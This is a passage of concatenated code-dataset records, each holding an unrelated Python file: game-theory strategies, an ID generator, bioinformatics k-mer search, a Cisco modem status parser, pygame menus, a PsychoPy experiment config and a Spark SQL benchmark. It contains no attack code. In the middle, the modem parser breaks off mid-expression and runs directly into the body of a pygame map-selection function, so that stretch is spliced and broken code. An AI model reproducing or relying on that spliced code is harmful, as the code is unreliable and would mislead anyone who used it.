DegDbClear)\nDegTreeview.bind(\"\", TreeButtonRelease)\nOpTreeview.bind(\"\",OpClick )\nOpTreeview.bind(\"\", OpDbClear)\nOpTreeview.bind(\"\",TreeButtonRelease )\n\nwin.mainloop()\n\n","sub_path":"FlyDrivers_FirstDragt(1).py","file_name":"FlyDrivers_FirstDragt(1).py","file_ext":"py","file_size_in_byte":20572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"238669085","text":"\"\"\"\nA hypothesis strategy for sampling Games.\n\nWe use hypothesis.strategies.recursive to build pairs of options recursively, with some base\nset of Games as leaves. By manual testing, using the second day games as leaves, and limiting left\nand right options to having at most two games tends to sample things best. Having too many options\nincreases the likelihood of a number which would dominate any interesting infinitesimals. As such,\nit would be pretty rare to sample tinies or the like.\n\"\"\"\n\nfrom hypothesis.strategies import composite, lists, recursive, sampled_from, tuples\n\nfrom .game import Game\nfrom .lattice import all_games_gen\nfrom .tools import canonicalize\n\n\n__all__ = [\n 'games',\n]\n\n\ndef gamify(options):\n \"\"\"\n Transform a nested pair of options into a Game in canonical form.\n\n Parameters\n ----------\n options : tuple(list, list)\n Nested tuples containing two lists of tuples containing two lists... with Games as leaves.\n\n Returns\n -------\n g : Game\n The Game represented by `options`.\n \"\"\"\n try:\n left, right = options\n left = [gamify(_) for _ in left]\n right = [gamify(_) for _ in right]\n return canonicalize(Game(left, right))\n except TypeError:\n return options\n\n\n@composite\ndef games(draw, base_day=2, max_options=2): # pragma: no cover\n \"\"\"\n A Hypothesis strategy for generating Games.\n\n Parameters\n ----------\n draw : func\n Required by hypothesis.strategies.composite.\n base_day : int >= 0\n The maximum birthday of games to use a leaves. Defaults to 2.\n max_options : int >= 0\n The maximum number of left, right options to allow for each subposition. Defaults to 2.\n Note that setting this number larger likely leads to the set being dominated by a number,\n reducing the variability in sampled games.\n\n Returns\n -------\n sample : Game\n A random Game.\n \"\"\"\n options = draw(recursive(base=sampled_from(list(all_games_gen(base_day))),\n extend=lambda child: tuples(lists(child, max_size=max_options),\n lists(child, max_size=max_options))))\n\n return gamify(options)\n","sub_path":"ludology/hypothesis.py","file_name":"hypothesis.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"212048381","text":"\"\"\"\n协议序列号:\n 格式: 0 - 46位时间戳 - 17位序列号\n\n直接调用 nextId()\n\"\"\"\nimport time\n\n\ndef getNewStamp():\n current_seconds = time.time()\n return int(current_seconds * 1000)\n\n\n# value 秒级时间戳\ndef timestamp_datetime(value):\n _format = '%Y-%m-%d %H:%M:%S'\n value = time.localtime(value)\n dt = time.strftime(_format, value)\n return dt\n\n\nclass GetSeqNo(object):\n sequence = 0\n lastStamp = 0\n\n # 2018-01-01 08:00:00,000\n START_STAMP = 1514764800000\n SEQUENCE_BIT = 17\n MAX_SEQUENCE = -1 ^ (-1 << SEQUENCE_BIT)\n TIMESTAMP_LEFT = SEQUENCE_BIT\n\n def __init__(self):\n self.sequence = 0\n self.lastStamp = 0\n\n def nextId(self):\n curr_stamp = getNewStamp()\n if curr_stamp == self.lastStamp:\n self.sequence = (self.sequence + 1) & self.MAX_SEQUENCE\n if self.sequence == 0:\n curr_stamp = self.getNextMill()\n else:\n self.sequence = 0\n\n self.lastStamp = curr_stamp\n return (curr_stamp - self.START_STAMP) << self.TIMESTAMP_LEFT | self.sequence\n\n def getNextMill(self):\n mill = getNewStamp()\n while mill <= self.lastStamp:\n mill = getNewStamp()\n return mill\n\n def getTimeMills(self, _id):\n self.isRangeID(_id)\n return (_id >> self.TIMESTAMP_LEFT) + self.START_STAMP\n\n def getSequence(self, _id):\n self.isRangeID(_id)\n return _id & self.MAX_SEQUENCE\n\n @staticmethod\n def isRangeID(_id):\n if _id < 0:\n raise RuntimeError(\"id range error.\")\n\n\nif __name__ == \"__main__\":\n seq = GetSeqNo()\n msg_id = seq.nextId()\n print(msg_id)\n print(timestamp_datetime(seq.getTimeMills(msg_id) / 1000))\n print(seq.getSequence(msg_id))\n","sub_path":"接口/B2B/b2b/testdata/simulate_upload/pb/get_seq_no.py","file_name":"get_seq_no.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"478525007","text":"print(\"=-=\"*9)\nprint(' SEQUENCIA DE FIBONATTI')\nprint(\"=-=\"*9)\n\nn1 = 0\nn2 = 1\ncount = 0\nresult = 0\ntermo = int(input(\"Informe um número: \"))\n\nif termo <= 0:\n print(f\"Número {termo} é inválido\")\n\nwhile count < termo:\n fib = n1 + n2\n\n n1 = n2\n n2 = fib\n count += 1\n\n if termo == fib:\n print('Açao bem sucedida!')\n result = fib\n\nif result != termo:\n print('Acão falhou...')\n\n\n\n\n","sub_path":"FIAP/Fase2_cap3/RM86567_Ex03.py","file_name":"RM86567_Ex03.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162125589","text":"ELEMENTS = [\"A\", \"C\", \"G\", \"T\"]\n\n\ndef hamming_distance(word_1, word_2):\n count = 0\n for letter_1, letter_2 in zip(word_1, word_2):\n if letter_1 != letter_2:\n count += 1\n return count\n\n\ndef get_neighbors(pattern, d):\n neighbors = []\n\n if d == 0:\n return pattern\n\n if len(pattern) == 1:\n return ELEMENTS\n\n suffix = get_neighbors(pattern[1:], d)\n for text in suffix:\n if hamming_distance(pattern[1:], text) < d:\n for element in ELEMENTS:\n neighbors.append(element + text)\n else:\n neighbors.append(pattern[0] + text)\n return neighbors\n\n\ndef get_words(genome, k):\n words = []\n for start in range(len(genome) - k + 1):\n end = start + k\n words.append(genome[start:end])\n return words\n\n\ndef get_neighborhood(words, d):\n neighborhood = set()\n for word in words:\n neighborhood.update(set(get_neighbors(word, d)))\n return neighborhood\n\n\ndef find_frequent(genome, k, d):\n result = []\n max = 0\n\n words = get_words(genome, k)\n neighborhood = get_neighborhood(words, d)\n\n for neighbor in neighborhood:\n frequent = 0\n for word in words:\n if hamming_distance(neighbor, word) <= d:\n frequent += 1\n\n if max < frequent:\n max = frequent\n result = [neighbor]\n elif max == frequent:\n result.append(neighbor)\n return result\n\n\nclass Executor:\n @staticmethod\n def _read_input_file(filename):\n with open(filename) as f:\n data = f.read()\n\n input_list = data.split()\n\n input_data = []\n for element in input_list:\n if 'input' in element.lower():\n continue\n elif 'output' in element.lower():\n break\n else:\n input_data.append(element)\n\n return input_data\n\n @staticmethod\n def execute(func, filename):\n input_data = Executor._read_input_file(filename)\n\n converted_input_data = []\n for element in input_data:\n if element.isdigit():\n converted_input_data.append(int(element))\n else:\n converted_input_data.append(element)\n\n result = func(*converted_input_data)\n print(*result)\n\n\nif __name__ == '__main__':\n Executor.execute(find_frequent, 'frequent_words_mismatch.txt')\n","sub_path":"04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"464950781","text":"import procgame.game\nimport pygame\nimport my_modes\nfrom pygame.locals import *\nfrom pygame.font import *\nfrom my_modes import PlanetMode\n\nclass MercuryMode(PlanetMode):\n \"\"\"\n This is the skillshot- it lights the sequence of lights and\n registers hits on the targets on the left hand side.\n \"\"\"\n def __init__(self, game):\n super(PlanetMode, self).__init__(game=game, priority=40)\n self.iPlanetTickCounter = 75\n self.iSpecialTickCounter = 60\n self.bSpecialCountdown = False\n self.strPlanetVoice = 'mercury_closest'\n self.strPlanetName = 'Mercury'\n self.strPlanetDisplayText = ['Mercury', '', 'Video Mode']\n pass\n\n def checkHit(self, num):\n if(num == -1):\n self.game.sound.play('laser')\n self.game.score(100)\n else:\n self.SuccessHelper()\n","sub_path":"my_modes/MercuryMode.py","file_name":"MercuryMode.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"198527569","text":"# __init__.py\n# Cisco DPC3216 Status Page Parser\n\nimport urllib.request\n\nDEFAULT_IP = \"192.168.100.1\"\nDEFAULT_PAGE = \"Docsis_system.asp\"\nDEFAULT_LANG = \"lang.js\"\n\nclass dpc3216:\n def __init__(self, pageData=\"\", langData=\"\"):\n self.pageData = pageData\n self.langData = langData\n self.STATIC = len(pageData) > 0\n self.lang = {}\n self.modemInfo = {}\n self.docsisInfo = {}\n self.rx = {}\n self.tx = {}\n self.lang[\"venabled\"] = \"Enabled\"\n #print(\"Cisco DPC3216 Parsing Library Initialized\")\n\n\n def getPageData(self):\n self.pageData = \"\"\n try:\n response = urllib.request.urlopen(\"http://{}/{}\".format(DEFAULT_IP, DEFAULT_PAGE))\n self.pageData = response.read().decode(\"utf-8\")\n if response.status != 200:\n print(\"There was a problem with fetching {}\".format(DEFAULT_PAGE))\n except Exception as e:\n print(\"Error fetching file: {}\".format(e))\n\n\n def getLangData(self):\n self.langData = \"\"\n try:\n response = urllib.request.urlopen(\"http://{}/{}\".format(DEFAULT_IP, DEFAULT_LANG))\n self.langData = response.read().decode(\"utf-8\")\n if response.status != 200:\n print(\"There was a problem with fetching {}\".format(DEFAULT_LANG))\n except Exception as e:\n print(\"Error fetching file: {}\".format(e))\n\n\n def parseLang(self):\n for line in self.langData.split(\"\\n\"):\n try:\n if line[0:3] == \"var\":\n #print(line[4:-1])\n name, rval = line[4:].split(\";\",1)[0].split(\"=\",1)\n if \"\\\"\" in rval:\n val = rval.replace(\"\\\"\",\"\").strip()\n self.lang[name] = val\n else:\n val = rval.strip()\n self.lang[name] = val\n #print(\"#Val: {} #Name: {}\".format(val, name))\n except Exception as e:\n print(\"Error with line: {}\\nLine: {}\".format(e, line))\n #print(self.lang)\n\n\n def scriptToName(self, var):\n start = var.find(\"dw(\") + 3\n end = var.find(\");\")\n #print(\"start: {} end: {}\".format(start, end))\n if start != -1 and end != -1:\n name = var[start:end]\n try:\n return self.lang[name]\n except:\n return name[1:] + \" << NAME RESOLVER FAIL\"\n\n\n def parseTable(self, tableName, tableData):\n tableLines = tableData.split(\"\\n\")\n if tableName == \"Modem Information\" or tableName == \"Docsis Information\":\n name = \"\"\n for x in range(0, len(tableLines)):\n\n if \"td id=\" in tableLines[x]:\n #print(tableLines[x].strip())\n #print(tableLines[x+1].strip())\n if \"script\" in tableLines[x+1]:\n #print(self.scriptToName(tableLines[x+1]))\n name = self.scriptToName(tableLines[x+1]).replace(\":\",\"\")\n else:\n pass\n #print(tableLines[x+1].strip())\n\n if \"td headers=\" in tableLines[x]:\n #print(tableLines[x].strip())\n #print(tableLines[x+1].strip())\n val = \"\"\n if \"script\" in tableLines[x+1]:\n #print(self.scriptToName(tableLines[x+1]))\n val = self.scriptToName(tableLines[x+1])\n else:\n #print(tableLines[x+1].strip())\n val = tableLines[x+1].strip()\n\n if tableName == \"Modem Information\":\n self.modemInfo[name] = val\n if tableName == \"Docsis Information\":\n self.docsisInfo[name] = val\n #print (\"x: {} line: {}\".format(x, tableLines[x]))\n elif tableName == \"Downstream Channel Information\" or tableName == \"Upstream Channel Information\":\n channel = -1\n name = \"\"\n pwr = \"\"\n snr = \"\"\n for x in range(0, len(tableLines)):\n #print()\n if \"td id=\\\"channel_\" in tableLines[x] or \"td id=\\\"up_channel_\" in tableLines[x]:\n #print(tableLines[x].strip())\n channelLoc = tableLines[x].find(\"channel_\") + len(\"channel_\")\n channel = int(tableLines[x][channelLoc:channelLoc+2].strip().replace(\"\\\"\",\"\"))\n #print(\"Channel: {}\".format(channel))\n name = \"Channel {}\".format(channel)\n\n if \"td headers=\\\"channel_\" in tableLines[x] or \"td headers=\\\"up_channel_\" in tableLines[x]:\n #print(tableLines[x].strip())\n val = \"\"\n\n start = tableLines[x].find(\"nowrap>\") + len(\"nowrap>\")\n end = tableLines[x].find(\" mapNum1Pos[0] and x < mapNum1Pos[0] + mapNum1Button.get_width() \\\n and y > mapNum1Pos[1] and y < mapNum1Pos[1] + mapNum1Button.get_height():\n\n # 地图选中特效\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_1.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n # 地图信息\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_1info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n mapInfoPos = (0,150)\n flagMapInfo = 1\n # shift picture\n\n if x > mapNum2Pos[0] and x < mapNum2Pos[0] + mapNum2Button.get_width() \\\n and y > mapNum2Pos[1] and y < mapNum2Pos[1] + mapNum2Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_1.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_2info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 2\n # shift picture\n\n if x > mapNum3Pos[0] and x < mapNum3Pos[0] + mapNum3Button.get_width() \\\n and y > mapNum3Pos[1] and y < mapNum3Pos[1] + mapNum3Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_1.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_3info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 3\n # shift picture\n\n if x > mapNum4Pos[0] and x < mapNum4Pos[0] + mapNum4Button.get_width() \\\n and y > mapNum4Pos[1] and y < mapNum4Pos[1] + mapNum4Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_1.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_4info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 4\n # shift picture\n\n if x > mapNum5Pos[0] and x < mapNum5Pos[0] + mapNum5Button.get_width() \\\n and y > mapNum5Pos[1] and y < mapNum5Pos[1] + mapNum5Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_1.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_5info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 5\n # shift picture\n\n if x > mapNum6Pos[0] and x < mapNum6Pos[0] + mapNum6Button.get_width() \\\n and y > mapNum6Pos[1] and y < mapNum6Pos[1] + mapNum6Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_1.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_6info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 6\n # shift picture\n\n if x > surePos[0] and x < surePos[0] + sureButton.get_width() \\\n and y > surePos[1] and y < surePos[1] + sureButton.get_height() \\\n and flagMapInfo > 0:\n selectCharacters(screen, clock, modeID, flagMapInfo)\n breakflag = 1\n # load game\n\n if x > backPos[0] and x < backPos[0] + backButton.get_width() \\\n and y > backPos[1] and y < backPos[1] + backButton.get_height():\n from selectMode import selectMode\n selectMode(screen, clock)\n breakflag = 1\n # here to come back\n\n elif x > homePos[0] and x < homePos[0] + homeButton.get_width() \\\n and y > homePos[1] and y < homePos[1] + homeButton.get_height():\n from initialMenu import initialMenu\n initialMenu(screen, clock)\n breakflag = 1\n # here to come back home\n\n # 填充背景和内容\n screen.blit(background, (0, 0))\n screen.blit(backButton, backPos)\n screen.blit(homeButton, homePos)\n screen.blit(mapTitle, mapTitlePos)\n screen.blit(modeIntro, modeIntroPos)\n screen.blit(mapNum1Button,mapNum1Pos)\n screen.blit(mapNum2Button, mapNum2Pos)\n screen.blit(mapNum3Button, mapNum3Pos)\n screen.blit(mapNum4Button, mapNum4Pos)\n screen.blit(mapNum5Button, mapNum5Pos)\n screen.blit(mapNum6Button, mapNum6Pos)\n if flagMapInfo > 0:\n screen.blit(mapinfo, mapInfoPos)\n screen.blit(sureButton, surePos)\n # 说明文字\n # screen.blit(font.render(\"用上下左右键来控制\", True, (166, 100, 30)), (300, 50))\n # 更新画面\n pygame.display.update()\n # 帧率\n clock.tick(40)\n if breakflag == 1:\n break\n\n\n","sub_path":"src/selectMap.py","file_name":"selectMap.py","file_ext":"py","file_size_in_byte":10357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507784223","text":"\"\"\"This file contains stimulus and task setting for probabilistic reversal\r\nlearning task. Options are organized into sections corresponding to certain\r\ntask objects or mechanisms.\r\n\r\nVersion for fMRI scanning, do not change!\r\n\"\"\"\r\n# Convert RGB color representation into PsychoPy default one\r\nrgb2psy = lambda x : [val / 127.5 - 1 for val in x]\r\n\r\n### Task construction ##########################################################\r\nN_trials = 110\r\nN_reversal = 4\r\nN_min_stable = 15\r\nreward_total = 50\r\nreward_minimum = 5\r\nreward_probability = 0.8\r\n\r\n# Account bar settings\r\naccount_max_rew = 2300\r\naccount_max_pun = 1200\r\ntick1_rew = 1150\r\ntick2_rew = 2300\r\ntick1_pun = 600\r\ntick2_pun = 0\r\n\r\n# Task timing (in seconds)\r\ntime_decision = 1.5 # Time to make decision\r\ntime_outcome = 1.5 # Time to see outcome\r\ntime_range_isi = (3, 7) # Interval between decision and outcome\r\ntime_range_iti = (3, 7) # Interval between trials\r\ntime_info_after = 10 # Time to see experiment summary (collected money)\r\nrefresh_rate = 60\r\n''' Total experiment time is:\r\n\r\n-> mean trial time: mtt = 1.5 (dec) + 1.5 (out) + 5 (isi) + 5 (iti) = 13 seconds\r\n-> dummy scan time: dst = 5 (N_dummy) * 2 (TR) = 10 seconds\r\n-> time info after: iat = (time_info_after) = 10 seconds\r\n\r\n-> total time: tt = 110 (N_trials) * mtt + dst + iat = 1430 + 10 + 10 =\r\n = 1450 seconds = 24 minutes 10 seconds\r\n\r\n-> extra time: 20 seconds\r\n-> sequence duration = tt + extra_time = 24 minutes 30 seconds\r\n'''\r\n\r\n# Available keys\r\nkey_quit = 'q'\r\nkey_left = 'a' # Left button SyncBox emulation\r\nkey_right = 'd' # Right button SyncBox emulation\r\nkey_pulse = 's' # Scanner pulse SyncBox emulation\r\n\r\n### Visual properties ##########################################################\r\n# Window (screen)\r\nwin_size = (800, 600)\r\nwin_monitor = 'testMonitor'\r\nwin_screen = 1 # For second screen, select 1.\r\nwin_fullscr = True\r\nwin_mouse_visible = False\r\nwin_color = [-1, -1, -1]\r\nwin_units = 'norm'\r\n\r\n# Boxes to choose\r\nbox_units = 'cm'\r\nbox_width = 5\r\nbox_height = 5\r\nbox_separation = 15\r\nbox_color1 = rgb2psy([86, 180, 233])\r\nbox_color2 = rgb2psy([240, 228, 66])\r\n\r\n# Account bar\r\nbar_height = 1\r\nbar_width = 20\r\nbar_y = -4\r\nbar_color = [-.8, -.8, -.8]\r\nbar_tick_width = .15\r\nbar_tick1_color = [1, 1, 1]\r\nbar_tick2_color = [1, 1, 1]\r\nbar_fill_color = [-.4, -.4, -.4]\r\n\r\n# Fixation circle\r\ncircle_units = 'cm'\r\ncircle_radius = 2\r\ncircle_edges = 50\r\ncircle_color = [-.4, -.4, -.4]\r\ncircle_line_width = 10\r\n\r\n# Digits and informations\r\ntext_units = 'cm'\r\ntext_digit_height = 1.5\r\ntext_letter_height = 1.5\r\ntext_digit_color = [-1, -1, -1]\r\ntext_letter_color = [1, 1, 1]\r\ntext_info_height = 1\r\ntext_up_y = 5\r\n","sub_path":"prl_task/prl_DecideNet_config_fmri.py","file_name":"prl_DecideNet_config_fmri.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"400478476","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom cowin_api.constants import Constants, Vaccine, Dose, Fees\n\n\ndef today() -> str:\n return datetime.now().strftime(Constants.DD_MM_YYYY)\n\n\ndef filter_centers(centers: dict, min_age_limit: Optional[int] = None, vaccine: Optional[Vaccine] = None,\n dose: Optional[Dose] = None, fees: Optional[Fees] = None):\n original_centers = centers.get('centers')\n filtered_centers = {'centers': []}\n\n for index, center in enumerate(original_centers):\n if fees and not center.get('fee_type') == fees.value:\n continue\n\n filtered_sessions = []\n for session in center.get('sessions'):\n\n if min_age_limit and not session.get('min_age_limit') == min_age_limit:\n continue\n if vaccine and not session.get('vaccine') == vaccine.value:\n continue\n if dose and not session.get(dose.value) > 0:\n continue\n\n filtered_sessions.append(session)\n\n if filtered_sessions:\n center['sessions'] = filtered_sessions\n filtered_centers['centers'].append(center)\n\n return filtered_centers\n","sub_path":"cowin_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6716647","text":"#Name: human_player.py\n#Purpose: file containing HumanPlayer class, which handles interaction with the user\n\nimport pygame\n\n\n\nclass HumanPlayer:\n\n\n #constructor\n #parameters are: size of tile in x direction, size of tile in y direction, clock used by the game, frames per second\n def __init__(self, tileXSize, tileYSize, clock, fps = 60):\n self.clock = clock\n self.fps = fps\n self.tileXSize = tileXSize\n self.tileYSize = tileYSize\n\n\n\n #function responsible for sampling move from the user\n #parameters are: board containing current state of the game, whose turn is it (necessary only for BotPlayer)\n #return values are: whether or not player has clicked exit, row of sampled move, column of sampled move\n def sampleMove(self, board, turn):\n done = False\n exitClicked = False\n\n while not done:\n for event in pygame.event.get():\n\n\n if event.type == pygame.QUIT: #quit\n done = True\n exitClicked = True\n \n\n elif event.type == pygame.MOUSEBUTTONDOWN: #get mouse input\n position = pygame.mouse.get_pos()\n\n row, column = self.convertPosition(position) #convert pixel position into row and column\n if 0 == board[row][column]: #check if given tile is empty\n done = True\n\n\n pygame.display.flip()\n self.clock.tick(self.fps)\n\n return exitClicked, row, column\n\n\n\n\n\n ################################################################################################################\n # Auxiliary functions #\n ################################################################################################################\n\n\n #convert pixel position into row and column\n #parameters are: pair of integers indicating x and y of the click\n #return values are: row of sampled move, column of sampled move \n def convertPosition(self, position):\n column = int(position[0] // self.tileXSize) + 1\n row = int(position[1] // self.tileYSize) + 1\n return row, column\n\n\n\n #wait until a key press\n def waitForKeyPress(self):\n done = False\n\n while not done:\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT or event.type == pygame.MOUSEBUTTONDOWN or event.type == pygame.KEYDOWN:\n done = True\n\n pygame.display.flip()\n self.clock.tick(self.fps)\n","sub_path":"human_player.py","file_name":"human_player.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"530970753","text":"# Copyright 2019 PerfKitBenchmarker Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Executes query on Spark SQL and records the latency.\n\nThe Data (TPCDS or TPCH) needs be generated first by user.\nTPCDS and TPCH tools.\nTPCDS: https://github.com/databricks/tpcds-kit\nTPCH: https://github.com/databricks/tpch-dbgen\n\nThis benchmark uses queries from https://github.com/databricks/spark-sql-perf.\nBecause spark SQL doesn't support all the queries that using dialect netezza.\n\"\"\"\n\nimport logging\nimport os\nimport re\nfrom perfkitbenchmarker import configs\nfrom perfkitbenchmarker import data\nfrom perfkitbenchmarker import dpb_service\nfrom perfkitbenchmarker import errors\nfrom perfkitbenchmarker import flags\nfrom perfkitbenchmarker import object_storage_service\nfrom perfkitbenchmarker import sample\nfrom perfkitbenchmarker import temp_dir\nfrom perfkitbenchmarker import vm_util\nfrom perfkitbenchmarker.dpb_service import BaseDpbService\n\nBENCHMARK_NAME = 'dpb_sparksql_benchmark'\n\nBENCHMARK_CONFIG = \"\"\"\ndpb_sparksql_benchmark:\n description: Run Spark SQL on dataproc and emr\n dpb_service:\n service_type: dataproc\n worker_group:\n vm_spec:\n GCP:\n machine_type: n1-standard-1\n AWS:\n machine_type: m5.xlarge\n worker_count: 2\n\"\"\"\nflags.DEFINE_string('dpb_sparksql_data', None,\n 'The dataset to run Spark SQL query')\nflags.DEFINE_enum('dpb_sparksql_query', 'tpcds_2_4', ['tpcds_2_4', 'tpch'],\n 'A list of query to run on dpb_sparksql_data')\nflags.DEFINE_list('dpb_sparksql_order', [],\n 'The order of query templates in each query stream.')\n\nFLAGS = flags.FLAGS\n\nSUPPORTED_DPB_BACKENDS = [dpb_service.DATAPROC, dpb_service.EMR]\nJOB_CATEGORY = BaseDpbService.SPARK_JOB_TYPE\nJOB_TYPE = 'spark-sql'\n# Creates spark table using pyspark by loading the parquet data.\n# Args:\n# argv[1]: string, The table name in the dataset that this script will create.\n# argv[2]: string, The data path of the table.\nSPARK_TABLE_SCRIPT = 'spark_table.py'\nSPARK_SQL_PERF_GIT = 'https://github.com/databricks/spark-sql-perf.git'\nSPARK_SQL_PERF_GIT_COMMIT = '6b2bf9f9ad6f6c2f620062fda78cded203f619c8'\n\n\ndef GetConfig(user_config):\n return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)\n\n\ndef CheckPrerequisites(benchmark_config):\n \"\"\"Verifies that the required resources are present.\n\n Args:\n benchmark_config: Config needed to run the Spark SQL.\n\n Raises:\n perfkitbenchmarker.errors.Config.InvalidValue: On encountering invalid\n configuration.\n \"\"\"\n dpb_service_type = benchmark_config.dpb_service.service_type\n if dpb_service_type not in SUPPORTED_DPB_BACKENDS:\n raise errors.Config.InvalidValue(\n 'Invalid backend {} for Spark SQL. Not in: {}'.format(\n dpb_service_type, SUPPORTED_DPB_BACKENDS))\n\n\ndef Prepare(benchmark_spec):\n \"\"\"Installs and sets up dataset on the Spark clusters.\n\n Copies SPARK_TABLE_SCRIPT and all the queries to cloud.\n Creates sparktable using SPARK_TABLE_SCRIPT.\n\n Args:\n benchmark_spec: The benchmark specification\n \"\"\"\n dpb_service_instance = benchmark_spec.dpb_service\n run_uri = benchmark_spec.uuid.split('-')[0]\n dpb_service_instance.CreateBucket(run_uri)\n\n temp_run_dir = temp_dir.GetRunDirPath()\n spark_sql_perf_dir = os.path.join(temp_run_dir, 'spark_sql_perf_dir')\n vm_util.IssueCommand(['git', 'clone', SPARK_SQL_PERF_GIT, spark_sql_perf_dir])\n vm_util.IssueCommand(['git', 'checkout', SPARK_SQL_PERF_GIT_COMMIT],\n cwd=spark_sql_perf_dir)\n query_dir = os.path.join(spark_sql_perf_dir, 'src', 'main', 'resources',\n FLAGS.dpb_sparksql_query)\n\n storage_service = 